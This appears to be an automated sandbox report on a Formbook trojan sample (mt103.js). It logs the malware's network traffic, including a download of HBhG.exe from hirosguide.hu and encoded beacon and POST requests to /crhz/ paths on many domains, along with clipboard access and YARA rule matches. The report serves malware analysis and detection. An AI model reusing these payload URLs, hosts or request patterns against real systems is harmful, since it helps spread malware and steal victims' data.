          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:47 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkeddate: Mon, 30 Jan 2023 12:40:53 GMTserver: LiteSpeedconnection: closeData Raw: 63 66 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 1a db 6e db c8 f5 39 fe 0a 9a 46 6d 32 e1 45 94 6c cb a6 c2 24 bb 49 16 2d 90 dd 04 71 b6 8b 22 0e 82 11 39 12 c7 e6 ad 33 43 cb 8a a2 e7 3e 17 fd 82 45 9f 8b 02 45 9f 76 1f b7 3f 92 3f e9 39 43 4a a2 2e 8e 1d 67 b3 6b c3 12 79 e6 dc e7 cc b9 90 be bf fd e4 f9 e3 57 7f 79 f1 54 8b 65 9a 3c d8 ba 8f 5f 5a 42 b2 61 a0 5f 30 5d 2b 38 1d b0 cb 40 cf 87 3e 60 c8 42 f8 ae 9b 0f 0b 27 a5 6e 26 76 74 2d 4c 88 10 81 9e e4 24 62 d9 d0 16 4c 52 2d cb ed 33 a1 23 2f 4a a2 07 5b 77 ee a7 54 12 2d 8c 09 17 54 06 fa f7 af be b1 8f 74 cd c5 95 84 65 e7 1a a7 49 a0 17 3c 1f b0 84 ea 5a 0c 12 03 1d 65 81 a8 61 5a 0c 9d 9c 0f dd cb 41 e6 7a de 3a 15 08 ed 93 f0 7c 85 4c 94 24 8c 4b 50 89 66 60 4a dc de ef 3a 61 9e ba 97 69 c2 8b d0 29 e2 42 31 02 4e 22 e4 ac 90 0f 8c 41 99 85 92 e5 99 81 e6 9b 13 fc 74 94 69 df 91 94 6a 81 b6 0c 70 38 2d 12 12 52 c3 3d ed 2b 63 4f fb ae b5 77 26 f6 cc a9 69 44 79 58 a6 34 93 ce ec e2 69 42 f1 cb ec dd 77 6b 71 5b 95 47 32 60 85 5e a6 a3 22 e7 12 7c 99 67 12 10 03 7d c4 22 19 07 11 bd 60 21 b5 d5 8d a5 b1 8c 49 46 12 5b 84 24 a1 41 e5 89 fb db b6 ad 9d 50 c2 c3 58 7b 9a 0d 59 46 b5 e7 85 64 29 7b 47 d0 18 ad 3f d6 5e 12 70 d5 b7 44 c6 9a 3d df 3f e1 70 80 a6 00 54 5e 89 73 30 d1 b6 81 9d 64 32 a1 0f 5e 90 21 d5 be cb a5 f6 4d 5e 66 11 d0 9d 7c f8 f9 5f b8 7f 1f 7e fe 37 d1 fe f7 77 f6 e1 e7 bf 65 5a f2 e1 a7 1f b3 58 eb ff f2 23 08 3f 8f 73 a2 81 97 ef bb 15 8b 25 03 79 de cf a5 68 98 37 c8 93 24 1f 59 10 27 2c 8b e8 a5 ee ce f0 21 06 0a ca e5 58 85 5b 92 a3 a5 0d b2 0b f6 f6 cf df 55 76 
af 63 cb 71 d1 c4 25 5c b2 10 a9 af c0 46 2d 1b e8 9f 61 f2 55 22 f0 24 bc 45 07 34 c4 dc 8a 6b e5 44 39 62 52 52 ee 87 84 47 0d 8e a2 4c 53 c2 c7 6f 13 c2 87 f4 2d 4b c1 8e 2b 49 7f 75 a3 ab 68 d6 d0 f5 e0 f1 a2 48 58 a8 e2 ce 4d a2 7b 67 22 cf e6 d9 01 c3 cd c6 78 83 e8 8d 69 4a f4 07 13 fd 91 d2 e3 52 ea be 3e 8f 4b b5 88 c7 5d b7 f4 47 43 4e 8a 58 f7 5f 03 aa da 5c 5f 7f 41 39 72 85 35 16 35 c9 36 1f f6 9d 62 86 ae 76 c1 d7 49 94 b2 4c 9f 5a 0b 86 3f d0 fe 09 6c d3 8d 39 8e 68 5f 54 f8 25 4f ae c5 5f 48 3e 39 2d 3d 4a 23 f4 ad ba 1a 10 ed b4 6c 79 9e c7 f0 36 ec 82 97 f1 82 78 e8 68 58 69 51 af e9 6c 4b 2f ca 7e c2 44 4c b9 ee 4f 3e cd fa a9 a5 b3 ec 19 a4 f3 12 43 c3 c7 9c de f4 c0 d7 1c 52 74 c8 cb b4 ff 8c 09 39 77 c4 4e 7f 0e 07 18 98 9c e2 72 9d c8 96 f6 04 e1 7f 82 75 54 32 07 e7 c0 f6 03 d4 ab a9 6e aa ee c2 55 7f 84 64 a4 4f a7 6f 56 b6 09 63 75 a1 1d ec 43 51 01 aa 7d 58 90 af c7 f4 e7 ba 9e 89 17 90 4c 9e 0f 6e ee f9 59 94 6c 70 bd a5 37 1c 3b 67 d8 f4 36 9a de a8 13 98 e0 dd 45 0e ff 21 e7 d1 0b 4e 85 d
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkeddate: Mon, 30 Jan 2023 12:40:56 GMTserver: LiteSpeedconnection: closeData Raw: 63 66 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 1a db 6e db c8 f5 39 fe 0a 9a 46 6d 32 e1 45 94 6c cb a6 c2 24 bb 49 16 2d 90 dd 04 71 b6 8b 22 0e 82 11 39 12 c7 e6 ad 33 43 cb 8a a2 e7 3e 17 fd 82 45 9f 8b 02 45 9f 76 1f b7 3f 92 3f e9 39 43 4a a2 2e 8e 1d 67 b3 6b c3 12 79 e6 dc e7 cc b9 90 be bf fd e4 f9 e3 57 7f 79 f1 54 8b 65 9a 3c d8 ba 8f 5f 5a 42 b2 61 a0 5f 30 5d 2b 38 1d b0 cb 40 cf 87 3e 60 c8 42 f8 ae 9b 0f 0b 27 a5 6e 26 76 74 2d 4c 88 10 81 9e e4 24 62 d9 d0 16 4c 52 2d cb ed 33 a1 23 2f 4a a2 07 5b 77 ee a7 54 12 2d 8c 09 17 54 06 fa f7 af be b1 8f 74 cd c5 95 84 65 e7 1a a7 49 a0 17 3c 1f b0 84 ea 5a 0c 12 03 1d 65 81 a8 61 5a 0c 9d 9c 0f dd cb 41 e6 7a de 3a 15 08 ed 93 f0 7c 85 4c 94 24 8c 4b 50 89 66 60 4a dc de ef 3a 61 9e ba 97 69 c2 8b d0 29 e2 42 31 02 4e 22 e4 ac 90 0f 8c 41 99 85 92 e5 99 81 e6 9b 13 fc 74 94 69 df 91 94 6a 81 b6 0c 70 38 2d 12 12 52 c3 3d ed 2b 63 4f fb ae b5 77 26 f6 cc a9 69 44 79 58 a6 34 93 ce ec e2 69 42 f1 cb ec dd 77 6b 71 5b 95 47 32 60 85 5e a6 a3 22 e7 12 7c 99 67 12 10 03 7d c4 22 19 07 11 bd 60 21 b5 d5 8d a5 b1 8c 49 46 12 5b 84 24 a1 41 e5 89 fb db b6 ad 9d 50 c2 c3 58 7b 9a 0d 59 46 b5 e7 85 64 29 7b 47 d0 18 ad 3f d6 5e 12 70 d5 b7 44 c6 9a 3d df 3f e1 70 80 a6 00 54 5e 89 73 30 d1 b6 81 9d 64 32 a1 0f 5e 90 21 d5 be cb a5 f6 4d 5e 66 11 d0 9d 7c f8 f9 5f b8 7f 1f 7e fe 37 d1 fe f7 77 f6 e1 e7 bf 65 5a f2 e1 a7 1f b3 58 eb ff f2 23 08 3f 8f 73 a2 81 97 ef bb 15 8b 25 03 79 de cf a5 68 98 37 c8 93 24 1f 59 10 27 2c 8b e8 a5 ee ce f0 21 06 0a ca e5 58 85 5b 92 a3 a5 0d b2 0b f6 f6 cf df 55 76 
af 63 cb 71 d1 c4 25 5c b2 10 a9 af c0 46 2d 1b e8 9f 61 f2 55 22 f0 24 bc 45 07 34 c4 dc 8a 6b e5 44 39 62 52 52 ee 87 84 47 0d 8e a2 4c 53 c2 c7 6f 13 c2 87 f4 2d 4b c1 8e 2b 49 7f 75 a3 ab 68 d6 d0 f5 e0 f1 a2 48 58 a8 e2 ce 4d a2 7b 67 22 cf e6 d9 01 c3 cd c6 78 83 e8 8d 69 4a f4 07 13 fd 91 d2 e3 52 ea be 3e 8f 4b b5 88 c7 5d b7 f4 47 43 4e 8a 58 f7 5f 03 aa da 5c 5f 7f 41 39 72 85 35 16 35 c9 36 1f f6 9d 62 86 ae 76 c1 d7 49 94 b2 4c 9f 5a 0b 86 3f d0 fe 09 6c d3 8d 39 8e 68 5f 54 f8 25 4f ae c5 5f 48 3e 39 2d 3d 4a 23 f4 ad ba 1a 10 ed b4 6c 79 9e c7 f0 36 ec 82 97 f1 82 78 e8 68 58 69 51 af e9 6c 4b 2f ca 7e c2 44 4c b9 ee 4f 3e cd fa a9 a5 b3 ec 19 a4 f3 12 43 c3 c7 9c de f4 c0 d7 1c 52 74 c8 cb b4 ff 8c 09 39 77 c4 4e 7f 0e 07 18 98 9c e2 72 9d c8 96 f6 04 e1 7f 82 75 54 32 07 e7 c0 f6 03 d4 ab a9 6e aa ee c2 55 7f 84 64 a4 4f a7 6f 56 b6 09 63 75 a1 1d ec 43 51 01 aa 7d 58 90 af c7 f4 e7 ba 9e 89 17 90 4c 9e 0f 6e ee f9 59 94 6c 70 bd a5 37 1c 3b 67 d8 f4 36 9a de a8 13 98 e0 dd 45 0e ff 21 e7 d1 0b 4e 85 d
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:14 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:17 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:41:19 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 30 Jan 2023 12:41:25 GMTContent-Type: text/htmlContent-Length: 166Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 30 Jan 2023 12:41:28 GMTContent-Type: text/htmlContent-Length: 166Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 30 Jan 2023 12:41:31 GMTContent-Type: text/htmlContent-Length: 166Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 10932Content-Type: text/html; charset=UTF-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:14 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 10932Content-Type: text/html; charset=UTF-8
          Source: unknownHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate Data Ascii: vG=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
          Source: unknownDNS traffic detected: queries for: hirosguide.hu
          Source: C:\Windows\explorer.exeCode function: 10_2_0598E4F2 getaddrinfo,SleepEx,setsockopt,recv,recv,10_2_0598E4F2
          Source: global trafficHTTP traffic detected: GET /ti/HBhG.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hirosguide.huConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_ HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_ HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&s91Fd8=b8xjX_ HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_ HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_ HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_ HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=qQeRCSv6osLquMzUsT5auAtcL2kpuT7TXoM3AMsXZ7zh5sUe46PrJPqpdbUyVeYEw0ooLJaeJdeynj+iQ6oazAlglr/WxPNHjeDwf7x3jgqV&s91Fd8=b8xjX_ HTTP/1.1Host: www.hayuterce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=Tx9+97zXAbAnLmq4XNOsmb2GkF5HGNr6W72qHdNRTeliJERxp4RJ6liISWgIuo8dFog55DG7ffTMmIYpdbhnOORXqYw1ibeJvOeh5iF0aDaW&s91Fd8=b8xjX_ HTTP/1.1Host: www.wylvxing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_ HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_ HTTP/1.1Host: www.thepromotionhunter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_ HTTP/1.1Host: www.nortonseecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.6:49714 version: TLS 1.2
          Source: C:\Windows\explorer.exeCode function: 10_2_05987E22 OpenClipboard,10_2_05987E22

          E-Banking Fraud

          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: mt103.js, type: SAMPLE, Matched rule: SUSP_obfuscated_JS_obfuscatorio, date = 2021-08-25, author = @imp0rtp3, description = Detects JS obfuscation done by the js obfuscator (often malicious), score = , reference = https://obfuscator.io
          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
